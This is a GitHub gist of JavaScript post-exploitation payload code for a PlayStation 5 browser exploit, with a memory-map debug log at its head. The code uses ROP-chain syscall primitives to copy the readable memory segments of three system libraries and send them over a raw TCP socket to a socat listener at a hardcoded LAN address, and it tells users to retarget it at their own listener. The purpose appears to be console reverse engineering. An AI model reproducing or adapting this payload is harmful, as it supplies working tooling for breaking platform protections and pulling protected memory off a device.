@psxdev
Created May 21, 2022 22:02
prospero dump readable segments
/*
We can't read the executable segment yet; this code dumps the readable segments of libSceLibcInternal, libKernel and libSceNKWebKit
[PROSPERO][DEBUG] pid: 73 vmap id: 80 start: 0x814ec8000 end: 0x814fa4000 size: 901120 prot: 4: --x structsize: 144 type:9 path:
[PROSPERO][DEBUG] pid: 73 vmap id: 81 start: 0x814fa4000 end: 0x814ff0000 size: 311296 prot: 1: r-- structsize: 144 type:9 path:
[PROSPERO][DEBUG] pid: 73 vmap id: 82 start: 0x814ff0000 end: 0x814ff8000 size: 32768 prot: 1: r-- structsize: 144 type:9 path:
[PROSPERO][DEBUG] pid: 73 vmap id: 83 start: 0x814ff8000 end: 0x814ffc000 size: 16384 prot: 3: rw- structsize: 144 type:9 path:
[PROSPERO][DEBUG] pid: 73 vmap id: 84 start: 0x814ffc000 end: 0x81500c000 size: 65536 prot: 3: rw- structsize: 144 type:1 path:
[PROSPERO][DEBUG] pid: 73 vmap id: 59 start: 0x8068b8000 end: 0x8068f8000 size: 262144 prot: 4: --x structsize: 144 type:9 path:
[PROSPERO][DEBUG] pid: 73 vmap id: 60 start: 0x8068f8000 end: 0x806914000 size: 114688 prot: 1: r-- structsize: 144 type:9 path:
[PROSPERO][DEBUG] pid: 73 vmap id: 61 start: 0x806914000 end: 0x806918000 size: 16384 prot: 1: r-- structsize: 144 type:9 path:
[PROSPERO][DEBUG] pid: 73 vmap id: 62 start: 0x806918000 end: 0x80691c000 size: 16384 prot: 3: rw- structsize: 144 type:9 path:
[PROSPERO][DEBUG] pid: 73 vmap id: 63 start: 0x80691c000 end: 0x806950000 size: 212992 prot: 3: rw- structsize: 144 type:1 path:
[PROSPERO][DEBUG] pid: 73 vmap id: 89 start: 0x8169f4000 end: 0x818c00000 size: 35700736 prot: 4: --x structsize: 144 type:9 path:
[PROSPERO][DEBUG] pid: 73 vmap id: 90 start: 0x818c00000 end: 0x819108000 size: 5275648 prot: 1: r-- structsize: 144 type:9 path:
[PROSPERO][DEBUG] pid: 73 vmap id: 91 start: 0x819108000 end: 0x8192f0000 size: 1998848 prot: 1: r-- structsize: 144 type:9 path:
[PROSPERO][DEBUG] pid: 73 vmap id: 92 start: 0x8192f0000 end: 0x819300000 size: 65536 prot: 3: rw- structsize: 144 type:9 path:
[PROSPERO][DEBUG] pid: 73 vmap id: 93 start: 0x819300000 end: 0x819324000 size: 147456 prot: 3: rw- structsize: 144 type:1 path:
*/
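// Destination for every dump: a 16-byte sockaddr built in guest memory and
// reused for each connection. Fields are written where the kernel expects
// them: family byte at +1 (2 = AF_INET), port at +2, address at +4, both in
// network byte order. 0x1247 is port 18194 (0x4712) byte-swapped — the same
// port the socat prompt below listens on — and 0xc01a8c0 is the receiving
// PC's IPv4 address byte-swapped (192.168.1.12). Change these two constants
// to point at your own listener.
let tcpsocketaddr = malloc(16, 1);
p.write1(tcpsocketaddr.add32(1), 2);
p.write2(tcpsocketaddr.add32(2), 0x1247);
p.write4(tcpsocketaddr.add32(4), 0xc01a8c0);

// Offset of the memcpy routine inside libSceLibcInternal that chain.call
// invokes to copy the segments into the send buffer.
const OFFSET_lk_memcpy = 0x03A90;

/**
 * Copy the readable segments that follow a module's executable segment into
 * a guest buffer and send that buffer over TCP to the listener described by
 * `tcpsocketaddr`.
 *
 * The readable segments are assumed to sit contiguously in memory directly
 * after the executable segment (see the vmap listing in the header comment),
 * so a single memcpy starting at `base + execSize` and spanning the sum of
 * `segmentSizes` covers all of them.
 *
 * @param {string} label         module name shown in the prompts
 * @param base                   module base address (the same type `chain.call`
 *                               and `.add32` accept)
 * @param {number} execSize      size of the leading --x segment, which is skipped
 * @param {number[]} segmentSizes sizes of the readable segments, in address order
 * @returns the guest buffer holding the copy; the caller keeps it referenced
 */
async function sendReadableSegments(label, base, execSize, segmentSizes) {
  const total = segmentSizes.reduce((sum, size) => sum + size, 0);
  alert(`prepare for dumping readable segments from ${label} set on pc socat -u TCP-LISTEN:18194,reuseaddr OPEN:out.txt,creat,trunc`);
  const sock = await chain.syscall(97, 2, 1, 0);
  alert(`sys_socket: ${sock}`);
  alert(`before sys_connect`);
  const connected = await chain.syscall(98, sock, tcpsocketaddr, 16);
  alert(`sys_connect: ${connected}`);
  // NOTE(review): syscall results are only displayed, never checked — a failed
  // socket/connect still falls through to memcpy and sendto. Confirm how
  // chain.syscall reports errors before adding a guard here.
  const buffer = malloc(total, 1);
  await chain.call(libSceLibcInternalBase.add32(OFFSET_lk_memcpy), buffer, base.add32(execSize), total);
  alert(`memcpy done`);
  // The alert shows both the sendto result and the requested size so a short
  // send is visible to the operator.
  const sent = await chain.syscall(133, sock, buffer, total, 0, 0, 0);
  alert(`sys_sendto: ${sent} ${total}`);
  const closed = await chain.syscall(6, sock);
  alert(`sys_close: ${closed}`);
  return buffer;
}

// Executable-segment size and readable-segment sizes are taken from the vmap
// listing in the header comment: the --x segment first, then the r--, r--,
// rw-, rw- segments that follow it.
let tcpmessage = await sendReadableSegments("libSceLibcInternal", libSceLibcInternalBase, 901120, [311296, 32768, 16384, 65536]);
let tcpmessage1 = await sendReadableSegments("libSceKernel", libKernelBase, 262144, [114688, 16384, 16384, 212992]);
let tcpmessage2 = await sendReadableSegments("libSceNKWebKit", libSceNKWebKitBase, 35700736, [5275648, 1998848, 65536, 147456]);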